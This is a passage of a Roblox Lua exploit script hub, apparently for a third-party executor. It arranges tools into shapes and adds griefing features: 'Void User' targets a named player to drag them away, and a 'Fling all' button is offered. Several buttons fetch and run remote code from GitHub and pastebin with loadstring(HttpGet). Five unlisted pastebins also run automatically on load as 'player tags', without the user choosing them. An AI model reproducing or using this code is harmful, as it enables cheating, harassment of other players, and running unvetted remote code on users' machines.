plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(0.15, 1.7, -0.02) * CFrame.Angles(1.58, math.rad(90), 1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(3, -0.9, -0.05) * CFrame.Angles(1.58, math.rad(-45), 1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(-3.1, -0.67, -0.049) * CFrame.Angles(1.58, math.rad(-135), 1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(2.2, -0.3, -0.03) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(4.2, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(6.2, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(8.2, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(10.2, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(12.2, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[10].Parent = plr.Character local hum = game:GetService("Players").LocalPlayer.Character.Humanoid for _,x in next, hum:GetPlayingAnimationTracks() do if x.Animation then x:Stop() end end end) --_______________________________________________________________________________________________ Section:NewButton("Pickaxe (8)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-0.4, 0.6, 0) * CFrame.Angles(1.6, math.rad(-180), 1.58) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(-2.7, 0.6, 0) * CFrame.Angles(1.6, math.rad(-180), 1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-4.5, 0.6, 0) * CFrame.Angles(1.6, math.rad(-180), 1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(-6.3, 0.6, 0) * CFrame.Angles(1.6, math.rad(-180), 1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-0.3, 6.85, -0.4) * CFrame.Angles(38.5, math.rad(-270), 2.3) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(1.8, 6.85, -0.4) * CFrame.Angles(38.5, math.rad(-270), 2.3) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(3.3, 5.4, 0.32) * CFrame.Angles(1.6, math.rad(-320), 1.6) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-2.42, 6.6, 0.32) * CFrame.Angles(1.6, math.rad(-220), 1.6) Tools[8].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Railgun (12)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(1.1, -1.2, 0) * CFrame.Angles(-1.58, math.rad(-108), -1.58) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(2.7, -1.2, 0.02) * CFrame.Angles(-1.58, math.rad(-108), -1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(4.5, -2.34, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(4, 5.1, -0.07) * CFrame.Angles(-1.58, math.rad(-180), -1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-5.6, 0.9, -0.07) * CFrame.Angles(-1.58, math.rad(-305), -1.58) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(-1.29, 3.5, -0.07) * CFrame.Angles(-1.58, math.rad(-262), -1.58) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(4, 1, -0.07) * CFrame.Angles(-1.58, math.rad(-193), -1.58) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-2.8, -0.8, 0) * CFrame.Angles(-1.58, math.rad(-25), -1.58) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(0.8, 4.8, -0.07) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(-2.3, -3.8, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(-3, -3.8, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(3, 4.8, -0.075) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[12].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Railgun v2 (23)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(1.1, -1.2, 0) * CFrame.Angles(-1.58, math.rad(-108), -1.58) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(2.7, -1.2, 0.02) * CFrame.Angles(-1.58, math.rad(-108), -1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(4.5, -2.34, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(4, 5.1, -0.07) * CFrame.Angles(-1.58, math.rad(-180), -1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-5.6, 0.9, -0.07) * CFrame.Angles(-1.58, math.rad(-305), -1.58) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(-1.29, 3.5, -0.07) * CFrame.Angles(-1.58, math.rad(-262), -1.58) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(4, 1, -0.07) * CFrame.Angles(-1.58, math.rad(-193), -1.58) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-2.8, -0.8, 0) * CFrame.Angles(-1.58, math.rad(-25), -1.58) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(0.8, 4.8, -0.07) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(0.6, -2.8, 0) * CFrame.Angles(-1.58, math.rad(-80), -1.58) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(-7.3, -2.3, 0) * CFrame.Angles(-1.58, math.rad(-45), -1.58) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(1.2, 3.95, -0.062) * CFrame.Angles(-1.58, math.rad(45), -1.58) Tools[12].Parent = plr.Character Tools[13].Grip = CFrame.new(4.3, 5.3, -0.075) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[13].Parent = plr.Character Tools[14].Grip = CFrame.new(-4.3, -3.5, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[14].Parent = plr.Character Tools[15].Grip = CFrame.new(6.6, 5.3, -0.075) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[15].Parent = plr.Character Tools[16].Grip = CFrame.new(-6.6, -3.5, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[16].Parent = plr.Character Tools[17].Grip = CFrame.new(8.8, 5.3, -0.075) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[17].Parent = plr.Character Tools[18].Grip = CFrame.new(-8.8, -3.5, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[18].Parent = plr.Character Tools[19].Grip = CFrame.new(11, 5.3, -0.075) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[19].Parent = plr.Character Tools[20].Grip = CFrame.new(-11, -3.5, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[20].Parent = plr.Character Tools[21].Grip = CFrame.new(3.7, 4.2, -0.075) * CFrame.Angles(-1.58, math.rad(-250), -1.58) Tools[21].Parent = plr.Character Tools[22].Grip = CFrame.new(-0.8, -4.1, 0) * CFrame.Angles(-1.58, math.rad(250), -1.58) Tools[22].Parent = plr.Character Tools[23].Grip = CFrame.new(-0.7, -0.2, -0.2) * CFrame.Angles(1.57, math.rad(-270), 0) Tools[23].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Computer (11)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0.8, 1.5, 0) * CFrame.Angles(1.575, math.rad(-180), 3.1) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(-0.8, -0.6, 0) * CFrame.Angles(1.575, math.rad(0), 3.1) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(3, 1.5, 0) * CFrame.Angles(1.575, math.rad(-180), 3.1) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(-3, -0.6, 0) * CFrame.Angles(1.575, math.rad(0), 3.1) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(5.2, 1.5, 0) * CFrame.Angles(1.575, math.rad(-180), 3.1) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(-5.2, -0.6, 0) * CFrame.Angles(1.575, math.rad(0), 3.1) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(1.1, 2.5, -2.95) * CFrame.Angles(1.575, math.rad(180), 4.68) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-2.2, -3, -2.17) * CFrame.Angles(3.13, math.rad(0), 3.1) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(-4, -3, -2.1699) * CFrame.Angles(3.13, math.rad(0), 3.1) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(2.2, 3.9, -2.26) * CFrame.Angles(3.13, math.rad(0), -0.04) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(4, 3.9, -2.26) * CFrame.Angles(3.13, math.rad(0), -0.04) Tools[11].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Boombox arm (4)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0.6, -0.1, -0.4) * CFrame.Angles(1.58, math.rad(-90), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(0.6, -0.1, -0.3625) * CFrame.Angles(1.58, math.rad(-90), 1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(0.6, -0.1, -0.359) * CFrame.Angles(0, math.rad(-90), 1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(0.6, -0.1, -0.4) * CFrame.Angles(0, math.rad(-90), -3.15) Tools[4].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Phone (6)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1, 0.5, 0) * CFrame.Angles(0.2, math.rad(-180), 58.1) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(2.5, -0, 0) * CFrame.Angles(-0.2, math.rad(-180), -58.13) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-2.5, 0.5, 0) * CFrame.Angles(0.2, math.rad(-180), 58.1) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(1, -0, 0) * CFrame.Angles(-0.2, math.rad(-180), -58.13) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-4, 0.5, 0) * CFrame.Angles(0.2, math.rad(-180), 58.1) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(4, -0, 0) * CFrame.Angles(-0.2, math.rad(-180), -58.13) Tools[6].Parent = plr.Character end) Section:NewButton("Small tophat (3)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1.5, -1.65, -1.9) * CFrame.Angles(1.58, math.rad(-180), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(3.65, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-3.625, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[3].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Big tophat (5)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1.5, -1.65, -1.9) * CFrame.Angles(1.58, math.rad(-180), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(3.65, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-3.625, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(6.3, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-6.3, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[5].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Huge tophat (7)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1.5, -1.65, -1.9) * CFrame.Angles(1.58, math.rad(-180), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(3.65, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-3.625, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(6.3, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-6.3, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(9, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(-9, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[7].Parent = plr.Character end) --_______________________________________________________________________________________________ -- other scripts, these are not made by me but just stuff that might be useful, dm me if there are things u want added to this part local Tab = Window:NewTab("Useful Stuff") local Section = Tab:NewSection("Stuff") -- comments... Section:NewButton("Human dildo (r6 only)", "", function() local ch = game:GetService("Players").LocalPlayer.Character ch["Left Arm"]:Destroy() ch["Right Arm"]:Destroy() ch.Head.Mesh:Destroy() end) Section:NewButton("AntiFling (only when standing still)", "", function() local plr = game:GetService("Players").LocalPlayer local UIS = game:GetService("UserInputService") game:GetService("RunService").RenderStepped:Connect(function(rs) if plr.Character.Humanoid.MoveDirection.X == 0 or plr.Character.Humanoid.MoveDirection.Z == 0 then wait() plr.Character.HumanoidRootPart.Anchored = true end end) UIS.InputBegan:Connect(function(keypress, Chat) if Chat then return end wait() if keypress.KeyCode.Name == "W" or "A" or "S" or "D" then wait() plr.Character.HumanoidRootPart.Anchored = false end end) end) Section:NewTextBox("Void User", "Void", function(skytarget) local plr = game:GetService("Players").LocalPlayer local character = plr.Character local ogpos = character.HumanoidRootPart.Position character.HumanoidRootPart.CFrame = CFrame.new(0,900000000,0) wait() local Character = game:GetService("Players").LocalPlayer.Character local Hum = { "BodyTypeScale", "BodyProportionScale", "BodyWidthScale", "BodyHeightScale", "BodyDepthScale", "HeadScale" } function Remove() repeat task.wait() until Character.LeftFoot:FindFirstChild("OriginalSize") Character.LeftFoot.OriginalSize:Destroy() Character.LeftLowerLeg.OriginalSize:Destroy() Character.LeftUpperLeg.OriginalSize:Destroy() end Character.LeftLowerLeg.LeftKneeRigAttachment.OriginalPosition:Destroy() Character.LeftUpperLeg.LeftKneeRigAttachment.OriginalPosition:Destroy() Character.LeftLowerLeg.LeftKneeRigAttachment:Destroy() Character.LeftUpperLeg.LeftKneeRigAttachment:Destroy() for i=1,6 do Remove() Character.Humanoid[Hum[i]]:Destroy() end wait(1) function getplayer(input) local players = game:GetService("Players") for _, v in pairs (players:GetPlayers()) do if v.DisplayName:lower():sub(1, #input) == input:lower() then return players[v.Name] end end end local user = getplayer(skytarget) NOW = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v) end local function tp(player,player2) local char1,char2=player.Character,player2.Character if char1 and char2 then char1.HumanoidRootPart.CFrame = char2.HumanoidRootPart.CFrame end end local function getout(player,player2) local char1,char2=player.Character,player2.Character if char1 and char2 then char1:MoveTo(char2.Head.Position) end end tp(user, game:GetService("Players").LocalPlayer) wait(0.1) tp(user, game:GetService("Players").LocalPlayer) wait(0.3) getout(game:GetService("Players").LocalPlayer, user) wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = NOW wait() character:BreakJoints() plr.CharacterAdded:Wait() character = plr.Character character:WaitForChild('HumanoidRootPart') wait(0.15) character.HumanoidRootPart.CFrame = CFrame.new(ogpos) end) Section:NewButton("Reload Character", "", function() game:GetService("Players").PlayerAdded:connect(function(plr) plr.CharacterAdded:connect(function(chr) repeat wait() until chr.Humanoid chr.Humanoid.Died:connect(function() plr.LoadCharacter() end) end) end) local plr = game:GetService("Players").LocalPlayer local character = plr.Character local ogpos = character.HumanoidRootPart.Position character:BreakJoints() plr.CharacterAdded:Wait() character = plr.Character character:WaitForChild('HumanoidRootPart') wait(0.15) character.HumanoidRootPart.CFrame = CFrame.new(ogpos) end) Section:NewButton("R15 Goblin Walk", "", function() local Character = game:GetService("Players").LocalPlayer.Character local Hum = { "BodyTypeScale", "BodyProportionScale", "BodyWidthScale", "BodyHeightScale", "BodyDepthScale", "HeadScale" } function Remove() repeat task.wait() until Character.LeftFoot:FindFirstChild("OriginalSize") Character.LeftLowerLeg.OriginalSize:Destroy() Character.LeftUpperLeg.OriginalSize:Destroy() end function Remove() repeat task.wait() until Character.RightFoot:FindFirstChild("OriginalSize") Character.RightLowerLeg.OriginalSize:Destroy() Character.RightUpperLeg.OriginalSize:Destroy() end Character.LeftLowerLeg.LeftKneeRigAttachment.OriginalPosition:Destroy() Character.LeftUpperLeg.LeftKneeRigAttachment.OriginalPosition:Destroy() Character.LeftLowerLeg.LeftKneeRigAttachment:Destroy() Character.LeftUpperLeg.LeftKneeRigAttachment:Destroy() Character.RightLowerLeg.RightKneeRigAttachment.OriginalPosition:Destroy() Character.RightUpperLeg.RightKneeRigAttachment.OriginalPosition:Destroy() Character.RightLowerLeg.RightKneeRigAttachment:Destroy() Character.RightUpperLeg.RightKneeRigAttachment:Destroy() for i=1,6 do Remove() Character.Humanoid[Hum[i]]:Destroy() end game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character end) Section:NewButton("Rejoin", "", function() game:GetService("TeleportService"):Teleport(game.PlaceId, game:GetService("Players").LocalPlayer) end) Section:NewButton("Unfocused Whitescreen", "", function() if not setfpscap then return end local UserInputService, RunService = game:GetService("UserInputService"), game:GetService("RunService") UserInputService.WindowFocusReleased:Connect(function() RunService:Set3dRenderingEnabled(false); setfpscap(5) end) UserInputService.WindowFocused:Connect(function() RunService:Set3dRenderingEnabled(true); setfpscap(360) end) end) Section:NewButton("Generate Join Script to Clipboard", "", function() local join_script = string.format("game:GetService('TeleportService'):TeleportToPlaceInstance(%s, '%s', game:GetService('Players').LocalPlayer)", game.PlaceId, game.JobId) print(join_script) everyClipboard(join_script) end) --_______________________________________________________________________________________________ local Tab = Window:NewTab("Other Scripts") local Section = Tab:NewSection("Other Scripts") Section:NewButton("CMD-X", "", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/CMD-X/CMD-X/master/Source", true))() end) --_______________________________________________________________________________________________ Section:NewButton("Infinite yield", "", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source", true))() end) --_______________________________________________________________________________________________ Section:NewButton("Fling all (dont be annoying and abuse this)", "", function() -- Attempting to put the 2 fling loadstrings into 1 pastebin to fix them. loadstring(game:HttpGet("https://pastebin.com/raw/Ns8hkFDH", true))() end) --_______________________________________________________________________________________________ Section:NewButton("Leg's FE Admin", "", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/leg1337/legadmv2/main/legadminv2.lua'))() end) local Tab = Window:NewTab("UI Setting") local Section = Tab:NewSection("Toggle UI") Section:NewKeybind("Select Keybind:", "keybind to toggle the gui", Enum.KeyCode.RightControl, function() Library:ToggleUI() end) --_______________________________________________________________________________________________ -- end of the ui so far, more stuff coming later when i actually learn lua lol --Player tags, this just exists so that people who use the script can see certain people --The pastebins are unlisted but still readable --Somn1ph0bia loadstring(game:HttpGet("https://pastebin.com/raw/M4vHABZN", true))() --iswattable loadstring(game:HttpGet("https://pastebin.com/raw/F1w3f2CQ", true))() --FalseValues loadstring(game:HttpGet("https://pastebin.com/raw/cQnk83gM", true))() --Somn1um loadstring(game:HttpGet("https://pastebin.com/raw/zwuLQSET", true))() --sad_Text123 (WHY, JUST WHY DID U WANT THIS?) loadstring(game:HttpGet("https://pastebin.com/raw/xRStuTck", true))() end }) Main:AddButton({ Title = "FE Pineapple Hub", Description = "for boomboxes", Callback = function() -- Gui to Lua -- Version: 3.2 -- Instances: local ScreenGui = Instance.new("ScreenGui") local Frame = Instance.new("Frame") local Frame_2 = Instance.new("Frame") local TextLabel = Instance.new("TextLabel") local TextLabel_2 = Instance.new("TextLabel") local Frame_3 = Instance.new("Frame") local TextBox = Instance.new("TextButton") local TextBox_2 = Instance.new("TextButton") local Frame_4 = Instance.new("Frame") local TextLabel_3 = Instance.new("TextLabel") local Frame_5 = Instance.new("Frame") local TextLabel_4 = Instance.new("TextLabel") local Frame_6 = Instance.new("Frame") local Frame_7 = Instance.new("Frame") local Frame_8 = Instance.new("Frame") local MAX = Instance.new("TextButton") local UICorner = Instance.new("UICorner") local MAY = Instance.new("TextButton") local UICorner_2 = Instance.new("UICorner") local MAZ = Instance.new("TextButton") local UICorner_3 = Instance.new("UICorner") local Frame_9 = Instance.new("Frame") local Frame_10 = Instance.new("Frame") local Frame_11 = Instance.new("Frame") local WAX = Instance.new("TextButton") local UICorner_4 = Instance.new("UICorner") local WAY = Instance.new("TextButton") local UICorner_5 = Instance.new("UICorner") local WAZ = Instance.new("TextButton") local UICorner_6 = Instance.new("UICorner") local WavesOn = Instance.new("TextButton") local UICorner_7 = Instance.new("UICorner") local TextLabel_5 = Instance.new("TextLabel") local TextLabel_6 = Instance.new("TextLabel") local TextLabel_7 = Instance.new("TextLabel") local Distance = Instance.new("TextBox") local WaveInt = Instance.new("TextBox") local Speed = Instance.new("TextBox") local AudioId = Instance.new("TextBox") local Amount = Instance.new("TextBox") local TextBox_3 = Instance.new("TextButton") local TextBox_4 = Instance.new("TextButton") local TextBox_5 = Instance.new("TextButton") --Properties: ScreenGui.Parent = game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui") ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling ScreenGui.ResetOnSpawn = false Frame.Parent = ScreenGui Frame.AnchorPoint = Vector2.new(0.5, 0.5) Frame.BackgroundColor3 = Color3.fromRGB(15, 15, 15) Frame.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame.BorderSizePixel = 2 Frame.Position = UDim2.new(0.5, 0, 0.564318538, 0) Frame.Size = UDim2.new(0, 429, 0, 385) Frame_2.Parent = Frame Frame_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Frame_2.BorderSizePixel = 0 Frame_2.Size = UDim2.new(0, 428, 0, 30) TextLabel.Parent = Frame_2 TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BackgroundTransparency = 1.000 TextLabel.Position = UDim2.new(0.0350467265, 0, 0, 0) TextLabel.Size = UDim2.new(0, 76, 0, 28) TextLabel.Font = Enum.Font.Code TextLabel.Text = "Pineapple" TextLabel.TextColor3 = Color3.fromRGB(255, 255, 127) TextLabel.TextSize = 15.000 TextLabel.TextXAlignment = Enum.TextXAlignment.Left TextLabel_2.Parent = Frame_2 TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.BackgroundTransparency = 1.000 TextLabel_2.Position = UDim2.new(0.273364484, 0, 0, 0) TextLabel_2.Size = UDim2.new(0, 73, 0, 28) TextLabel_2.Font = Enum.Font.Code TextLabel_2.Text = "v1.1 (a)" TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.TextSize = 15.000 TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left Frame_3.Parent = Frame Frame_3.BackgroundColor3 = Color3.fromRGB(131, 131, 131) Frame_3.BackgroundTransparency = 0.700 Frame_3.BorderColor3 = Color3.fromRGB(27, 42, 53) Frame_3.Position = UDim2.new(0.235746518, 0, 0, 0) Frame_3.Size = UDim2.new(0, 1, 0, 28) TextBox.Name = "TextBox" TextBox.Parent = Frame TextBox.BackgroundColor3 = Color3.fromRGB(20, 20, 20) TextBox.BorderColor3 = Color3.fromRGB(54, 54, 54) TextBox.Position = UDim2.new(0.345004708, 0, 0.104059465, 0) TextBox.Size = UDim2.new(0, 125, 0, 26) TextBox.Font = Enum.Font.Code TextBox.Text = "Visualize" TextBox.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox.TextSize = 14.000 TextBox_2.Name = "TextBox" TextBox_2.Parent = Frame TextBox_2.BackgroundColor3 = Color3.fromRGB(20, 20, 20) TextBox_2.BorderColor3 = Color3.fromRGB(54, 54, 54) TextBox_2.Position = UDim2.new(0.678338051, 0, 0.104059465, 0) TextBox_2.Size = UDim2.new(0, 119, 0, 26) TextBox_2.Font = Enum.Font.Code TextBox_2.Text = "Mass-Play" TextBox_2.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox_2.TextSize = 14.000 Frame_4.Parent = Frame Frame_4.BackgroundColor3 = Color3.fromRGB(131, 131, 131) Frame_4.BackgroundTransparency = 0.550 Frame_4.Position = UDim2.new(0, 0, 0.296949506, 0) Frame_4.Size = UDim2.new(0, 429, 0, 1) TextLabel_3.Parent = Frame TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_3.BackgroundTransparency = 1.000 TextLabel_3.Position = UDim2.new(0.40856266, 0, 0.297674388, 0) TextLabel_3.Size = UDim2.new(0, 69, 0, 26) TextLabel_3.Font = Enum.Font.Code TextLabel_3.Text = "Settings" TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_3.TextSize = 15.000 Frame_5.Parent = Frame Frame_5.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Frame_5.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_5.Position = UDim2.new(0.0233100224, 0, 0.384053171, 0) Frame_5.Size = UDim2.new(0, 408, 0, 224) TextLabel_4.Parent = Frame_5 TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_4.BackgroundTransparency = 1.000 TextLabel_4.Position = UDim2.new(0.0606433637, 0, 0.0342337564, 0) TextLabel_4.Size = UDim2.new(0, 69, 0, 13) TextLabel_4.Font = Enum.Font.Code TextLabel_4.Text = "Main Angle" TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_4.TextSize = 13.000 Frame_6.Parent = Frame_5 Frame_6.BackgroundColor3 = Color3.fromRGB(25, 25, 25) Frame_6.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_6.Position = UDim2.new(0.0147058824, 0, 0.163043484, 0) Frame_6.Size = UDim2.new(0, 107, 0, 24) Frame_7.Parent = Frame_6 Frame_7.BackgroundColor3 = Color3.fromRGB(80, 80, 80) Frame_7.BackgroundTransparency = 0.700 Frame_7.BorderColor3 = Color3.fromRGB(27, 42, 53) Frame_7.Position = UDim2.new(0.335000008, 0, 0, 0) Frame_7.Size = UDim2.new(0, 1, 0, 24) Frame_8.Parent = Frame_6 Frame_8.BackgroundColor3 = Color3.fromRGB(80, 80, 80) Frame_8.BackgroundTransparency = 0.700 Frame_8.BorderColor3 = Color3.fromRGB(27, 42, 53) Frame_8.Position = UDim2.new(0.660274863, 0, 0, 0) Frame_8.Size = UDim2.new(0, 1, 0, 24) MAX.Name = "MAX" MAX.Parent = Frame_6 MAX.BackgroundColor3 = Color3.fromRGB(255, 255, 127) MAX.Position = UDim2.new(0.0093457941, 0, 0, 0) MAX.Size = UDim2.new(0, 35, 0, 24) MAX.Font = Enum.Font.Code MAX.Text = "X" MAX.TextColor3 = Color3.fromRGB(53, 53, 53) MAX.TextSize = 14.000 